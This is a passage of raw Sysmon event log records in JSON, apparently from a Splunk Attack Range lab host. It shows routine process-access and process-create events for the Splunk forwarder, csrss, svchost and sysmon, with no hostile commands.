C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00103A5E0500}","TargetProcessId":"4384","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3271,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.984\r\nProcessGuid: {E2A3D6B1-10FF-5F25-0000-0010FB5E0500}\r\nProcessId: 800\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-10FF-5F25-0000-00103A5E0500}\r\nParentProcessId: 4384\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.984","ProcessGuid":"{E2A3D6B1-10FF-5F25-0000-0010FB5E0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-10FF-5F25-0000-00103A5E0500}","ParentProcessId":"4384","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3272,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-10FF-5F25-0000-00103A5E0500}\r\nSourceProcessId: 4384\r\nSourceThreadId: 5072\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010FB5E0500}\r\nTargetProcessId: 800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00103A5E0500}","SourceProcessId":"4384","SourceThreadId":"5072","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010FB5E0500}","TargetProcessId":"800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3273,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010FB5E0500}\r\nTargetProcessId: 800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010FB5E0500}","TargetProcessId":"800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3274,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3275,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3276,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3277,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3278,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.972","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3279,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.972\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 